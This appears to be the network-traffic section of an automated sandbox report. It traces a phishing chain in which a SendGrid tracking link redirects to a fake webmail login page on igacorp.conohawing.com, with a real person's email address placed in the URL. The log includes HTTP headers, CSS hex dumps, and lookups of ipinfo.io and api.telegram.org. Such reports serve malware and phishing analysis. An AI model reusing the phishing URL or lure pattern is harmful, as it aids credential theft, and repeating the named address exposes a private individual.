                                                                                                                                          Nov 28, 2024 11:32:24.802498102 CET1.1.1.1192.168.2.40xde80No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:42.449820995 CET1.1.1.1192.168.2.40xc5e5No error (0)www.agriparadigma.it5.57.41.119A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:44.008064032 CET1.1.1.1192.168.2.40xd18aNo error (0)www.agriparadigma.it5.57.41.119A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:54.845139980 CET1.1.1.1192.168.2.40x5e70No error (0)www.agriparadigma.it5.57.41.119A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:58.131026030 CET1.1.1.1192.168.2.40xb4a1No error (0)www.tentamus.com5.57.42.148A (IP address)IN (0x0001)false
                                                                                                                                          • u48396839.ct.sendgrid.net
                                                                                                                                          • igacorp.conohawing.com
                                                                                                                                          • https:
                                                                                                                                            • code.jquery.com
                                                                                                                                            • cdnjs.cloudflare.com
                                                                                                                                            • maxcdn.bootstrapcdn.com
                                                                                                                                            • stackpath.bootstrapcdn.com
                                                                                                                                            • www.google.com
                                                                                                                                            • logo.clearbit.com
                                                                                                                                            • image.thum.io
                                                                                                                                            • ipinfo.io
                                                                                                                                            • dns.google
                                                                                                                                            • api.telegram.org
                                                                                                                                            • www.agriparadigma.it
                                                                                                                                            • www.tentamus.com
                                                                                                                                          • slscr.update.microsoft.com
                                                                                                                                          • fs.microsoft.com
                                                                                                                                          • otelrules.azureedge.net
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.4497865.57.41.119802692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 28, 2024 11:32:42.571252108 CET435OUTGET / HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Nov 28, 2024 11:32:43.864573002 CET517INHTTP/1.1 302 Found
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:43 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Location: https://www.agriparadigma.it/
                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                          Expires: Thu, 28 Nov 2024 10:32:43 GMT
                                                                                                                                          Content-Length: 213
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 67 72 69 70 61 72 61 64 69 67 6d 61 2e 69 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.agriparadigma.it/">here</a>.</p></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.44973923.218.208.109443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:07 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                          2024-11-28 10:32:07 UTC478INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Server: Kestrel
                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                          X-Ms-Region: prod-neu-z1
                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                          X-OSID: 2
                                                                                                                                          X-CID: 2
                                                                                                                                          X-CCC: GB
                                                                                                                                          Cache-Control: public, max-age=56919
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:07 GMT
                                                                                                                                          Connection: close
                                                                                                                                          X-CID: 2


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.449741167.89.123.164432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:09 UTC1901OUTGET /ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3 [TRUNCATED]
                                                                                                                                          Host: u48396839.ct.sendgrid.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:09 UTC328INHTTP/1.1 302 Found
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:09 GMT
                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                          Content-Length: 152
                                                                                                                                          Connection: close
                                                                                                                                          Location: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.it
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          2024-11-28 10:32:09 UTC152INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 67 61 63 6f 72 70 2e 63 6f 6e 6f 68 61 77 69 6e 67 2e 63 6f 6d 2f 73 65 63 75 72 65 2f 61 75 74 68 2f 77 65 62 2f 73 65 63 75 72 65 2f 61 75 74 68 2d 77 65 62 6d 61 69 6c 2d 77 65 62 2d 63 6f 6e 2d 73 65 63 75 72 65 2d 61 63 63 6f 75 6e 74 2e 68 74 6d 6c 23 67 69 61 6e 70 69 65 72 6f 2e 6c 75 63 69 61 6e 69 40 61 67 72 69 70 61 72 61 64 69 67 6d 61 2e 69 74 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                          Data Ascii: <a href="https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.it">Found</a>.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.449743118.27.122.264432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:12 UTC728OUTGET /secure/auth/web/secure/auth-webmail-web-con-secure-account.html HTTP/1.1
                                                                                                                                          Host: igacorp.conohawing.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:12 UTC341INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:12 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Content-Length: 365359
                                                                                                                                          Connection: close
                                                                                                                                          Last-Modified: Tue, 26 Nov 2024 09:27:20 GMT
                                                                                                                                          ETag: "5932f-627cd74c18620"
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-Nginx-Cache: EXPIRED
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:32:12 UTC16043INData Raw: 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 e5 b7 b2 e4 b8 8b e6 9e b6 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 21 2d 2d 20 53 74 79 6c 65 73 2c 20 4a 61 76 61 73 63 72 69 70 74 20 61 6e 64 20 6f 74 68 65 72 20 74 68 69 6e 67 73 20 67 6f 20 68 65 72 65 20 2d 2d 3e 0d 0a 20 20 3c 73 63
                                                                                                                                          Data Ascii: <html lang=""><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> ... Styles, Javascript and other things go here --> <sc
                                                                                                                                          2024-11-28 10:32:12 UTC16384INData Raw: 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2e 66 61 2d 63 61 72 65 74 2d 73 71 75 61 72 65 2d 6f 2d 75 70 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 35 31 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2e 66 61 2d 74 6f 67 67 6c 65 2d 75 70 20 7b 0d 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 46 72 65 65 22 3b 0d 0a 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2e 66 61 2d 74 6f 67 67 6c 65 2d 75 70 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 35 31 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2e 66 61 2d
                                                                                                                                          Data Ascii: } .fa.fa-caret-square-o-up:before { content: "\f151" } .fa.fa-toggle-up { font-family: "Font Awesome 5 Free"; font-weight: 400 } .fa.fa-toggle-up:before { content: "\f151" } .fa.fa-
                                                                                                                                          2024-11-28 10:32:13 UTC16384INData Raw: 3a 20 34 30 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2e 66 61 2d 68 61 6e 64 2d 73 74 6f 70 2d 6f 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 35 36 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2e 66 61 2d 68 61 6e 64 2d 73 63 69 73 73 6f 72 73 2d 6f 20 7b 0d 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 46 72 65 65 22 3b 0d 0a 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2e 66 61 2d 68 61 6e 64 2d 73 63 69 73 73 6f 72 73 2d 6f 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 35 37 22 0d 0a 20 20 20 20 7d 0d
                                                                                                                                          Data Ascii: : 400 } .fa.fa-hand-stop-o:before { content: "\f256" } .fa.fa-hand-scissors-o { font-family: "Font Awesome 5 Free"; font-weight: 400 } .fa.fa-hand-scissors-o:before { content: "\f257" }
                                                                                                                                          2024-11-28 10:32:13 UTC16384INData Raw: 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 61 70 70 6c 65 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 37 39 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 61 70 70 6c 65 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 64 31 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 61 70 70 6c 65 2d 70 61 79 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 31 35 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 61 72 63 68 69 76 65 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 38 37 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d
                                                                                                                                          Data Ascii: } .fa-apple:before { content: "\f179" } .fa-apple-alt:before { content: "\f5d1" } .fa-apple-pay:before { content: "\f415" } .fa-archive:before { content: "\f187" } .fa-
                                                                                                                                          2024-11-28 10:32:13 UTC16384INData Raw: 61 75 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 38 39 65 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 63 6f 75 63 68 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 62 38 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 63 70 61 6e 65 6c 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 38 38 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 63 72 65 61 74 69 76 65 2d 63 6f 6d 6d 6f 6e 73 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 35 65 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 63 72 65 61 74 69 76 65 2d 63 6f 6d 6d 6f 6e 73 2d 62
                                                                                                                                          Data Ascii: au:before { content: "\f89e" } .fa-couch:before { content: "\f4b8" } .fa-cpanel:before { content: "\f388" } .fa-creative-commons:before { content: "\f25e" } .fa-creative-commons-b
                                                                                                                                          2024-11-28 10:32:13 UTC16384INData Raw: 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 61 79 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 61 62 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 62 33 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 2d 67 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 64 35 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22
                                                                                                                                          Data Ascii: } .fa-google-play:before { content: "\f3ab" } .fa-google-plus:before { content: "\f2b3" } .fa-google-plus-g:before { content: "\f0d5" } .fa-google-plus-square:before { content: "
                                                                                                                                          2024-11-28 10:32:13 UTC16384INData Raw: 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 6d 69 63 72 6f 73 6f 66 74 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 63 61 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 6d 69 6e 75 73 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 38 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 6d 69 6e 75 73 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 35 36 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 6d 69 6e 75 73 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 34 36 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20
                                                                                                                                          Data Ascii: } .fa-microsoft:before { content: "\f3ca" } .fa-minus:before { content: "\f068" } .fa-minus-circle:before { content: "\f056" } .fa-minus-square:before { content: "\f146" }
                                                                                                                                          2024-11-28 10:32:13 UTC16384INData Raw: 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 73 69 74 68 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 31 32 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 73 6b 61 74 69 6e 67 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 63 35 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 73 6b 65 74 63 68 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 63 36 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 73 6b 69 69 6e 67 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 63 39 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 73 6b 69 69 6e 67 2d 6e 6f
                                                                                                                                          Data Ascii: } .fa-sith:before { content: "\f512" } .fa-skating:before { content: "\f7c5" } .fa-sketch:before { content: "\f7c6" } .fa-skiing:before { content: "\f7c9" } .fa-skiing-no
                                                                                                                                          2024-11-28 10:32:13 UTC16384INData Raw: 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 76 69 61 64 65 6f 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 61 39 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 76 69 61 64 65 6f 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 61 61 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 76 69 61 6c 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 39 32 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 76 69 61 6c 73 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 39 33 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 61 2d 76 69 62 65 72
                                                                                                                                          Data Ascii: } .fa-viadeo:before { content: "\f2a9" } .fa-viadeo-square:before { content: "\f2aa" } .fa-vial:before { content: "\f492" } .fa-vials:before { content: "\f493" } .fa-viber
                                                                                                                                          2024-11-28 10:32:13 UTC16384INData Raw: 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 32 32 31 32 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 6c 6f 75 64 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 32 36 30 31 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 67 6c 79 70 68 69 63 6f 6e 2d 65 6e 76 65 6c 6f 70 65 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 32 37 30 39 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 65 6e 63 69 6c 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 32 37 30 66 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 67 6c 79 70 68 69 63 6f 6e 2d 67 6c 61
                                                                                                                                          Data Ascii: fore { content: "\2212" } .glyphicon-cloud:before { content: "\2601" } .glyphicon-envelope:before { content: "\2709" } .glyphicon-pencil:before { content: "\270f" } .glyphicon-gla


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.449745151.101.66.1374432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:14 UTC540OUTGET /jquery-3.1.1.min.js HTTP/1.1
                                                                                                                                          Host: code.jquery.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:14 UTC613INHTTP/1.1 200 OK
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 86709
                                                                                                                                          Server: nginx
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                          ETag: "28feccc0-152b5"
                                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:14 GMT
                                                                                                                                          Age: 1309405
                                                                                                                                          X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740076-EWR
                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                          X-Cache-Hits: 4188, 5
                                                                                                                                          X-Timer: S1732789935.605402,VS0,VE0
                                                                                                                                          Vary: Accept-Encoding
